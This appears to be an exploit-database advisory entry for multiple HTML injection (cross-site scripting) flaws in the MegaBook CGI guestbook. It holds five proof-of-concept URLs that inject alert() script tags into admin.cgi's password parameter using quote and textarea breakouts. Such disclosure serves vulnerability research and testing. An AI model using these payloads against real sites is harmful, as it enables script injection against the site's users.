MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities

Author: Morning Wood
type: webapps
platform: cgi
port: 
date_added: 2003-06-29  
date_updated: 2012-11-20  
verified: 1  
codes: OSVDB-3201  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22843.txt  

source: https://www.securityfocus.com/bid/8065/info

MegaBook is prone to multiple HTML injection vulnerabilities. This is due to insufficient sanitization of HTML and script code from user-supplied input, including input supplied to the administrative login page and via the client HTTP User-Agent: header field. Exploitation of these issues could permit hostile HTML or script code to be injected into the guestbook system and rendered in the browser of a legitimate guestbook user.

http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=&lt;/textarea&gt;<script>alert('wvs-xss-magic-string-723975367');</script>